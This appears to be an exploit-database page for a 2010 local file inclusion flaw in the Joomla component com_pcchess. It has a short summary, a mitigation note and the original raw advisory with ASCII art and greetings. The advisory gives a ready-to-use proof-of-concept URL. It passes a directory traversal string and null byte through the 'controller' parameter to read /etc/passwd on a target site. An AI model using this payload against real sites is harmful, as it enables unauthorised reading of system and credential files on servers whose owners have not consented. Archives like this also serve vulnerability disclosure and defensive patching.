header-logo
Suggest Exploit
vendor:
com_pcchess
by:
team_elite
5.5
CVSS
MEDIUM
Local File Inclusion
CWE
Product Name: com_pcchess
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

joomla Component com_pcchess Local File Inclusion Vulnerability

The exploit allows an attacker to include local files by manipulating the 'controller' parameter in the URL. The vulnerability can be exploited by appending '../../../../../../../../../../../' to the 'controller' parameter.

Mitigation:

Apply the latest patch or update provided by the vendor. Restrict access to the affected component.
Source

Exploit-DB raw data:

================================================================================================
================================================================================================
==   @@@@@@@@  @@@@@@  @@@@@@@  @@       @@            @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==   @@@@@@@@  @@@@@@  @@@@@@@  @@@     @@@	       @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==      @@     @@      @@   @@  @@ @   @ @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@  @ @  @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@@@@@@  @@   @   @@            @@@@@@  @@      @@     @@     @@@@@@   ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@   @@  @@       @@            @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==      @@     @@@@@@  @@   @@  @@       @@ @@@@@@@@@@ @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==											      ==
================================================================================================
================================================================================================
		 |||                                    |||
		 |||					|||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[  								                                                     	[[  
[[ joomla Component com_pcchess Local File Inclusion Vulnerability 						        [[
[[															[[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |				       	[[
[[															[[
[[ ##   Exploit: index.php?option=com_pcchess&controller=[LFI]%00							[[
[[															[[
[[ ##   PoC: 													        [[
[[															[[
[[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[
[[															[[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
		 |||					|||
		 |||					|||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member gcc, all member manadocoding   ~~~~
~~~~									~~~~
~~~~    MC team : team_elite , devilbat , zreg				~~~~
~~~~    thanks for : cr4wl3r						~~~~
~~~~									~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* -                          ,              
* -                        @@               
* -                      @@#                
* -                    :@@;                 
* -                   @@@@@        ......`  
* -                  @@@@.@@@@@@@@@@@#      
* -             @@@@@@@@@@@@@@@@@@`         
* -               @@@@@@@@@@@@@@@@@@@@;     
* -              #@@@@@@@@@@@@@@@@@         
* -            `@@,@@@@@@@@@@@@@@@@@:       
* -           @@@+@@@@@@@ @@@@@@@;@@@`      
* -         :@@@@@@@@@:@,; @@@@@@@ .@@      
* -        @@@@@@@@@@@  :  @@@@@@@@  @@     
* -       @@@@'     `   ` @@@@@@@@@:  +.    
* -       .@@            @@@@@@@@@@@   .    
* -           ,       +@@@@@@@@@@@@@        
* -            +@@@@@@@@@@@@@@@@@@@@#       
* -           ,@@@@@@@@@@@@@@@@@ +@@@       
* -        `@@@@@@@@@@@@@@@@@@@   @@@       
* -       @@@@@@@@@@@@@@@@@@@     @@`       
* -      @@@@@@@@@@@@@@@@@@       @@        
* -     +@@@@@@@@@@; @@@#         @         
* -     @@@@@@@@@         :                 
* -     @@@@@@@@           ,@@              
* -    @@@@@@@@@             @@@'           
* -    @@@@@@@`@               @@@;         
* -    @@@@@@@  @       @.  @@@@@@@@        
* -    @@@@@@@@@        @@@@@@@@@@@@@#      
* -     @@@@@@@@@@@@    @@@@@@@@@@@@@@@     
* -     @ @@@@@@@     ;@@@@@@@@@@@@@@@@@    
* -     @ @@@@@@@@@@@@@@@@@@@      ,@@@@+   
* -       @@@@@@@@@@@@@@@@@@@        @@@@   
* -       @@@ @@@@@@@@@  @@@@@@;     @@@@   
* -       @@    @@@@@@@`  @@@        . @@.  
* -       @@      ; @@@@#  :@@@@@#     @@.  
* -       @           @@@:             ;@   
* -      ;`             @@             ;@   
* -                      @@            @    
* -                       @            #    
* -                       :           :     
* --------------------------------------------->>>> bugs found on 08 April 2010 by team_elite.

Navigation

Suggest Exploit

Services By CQR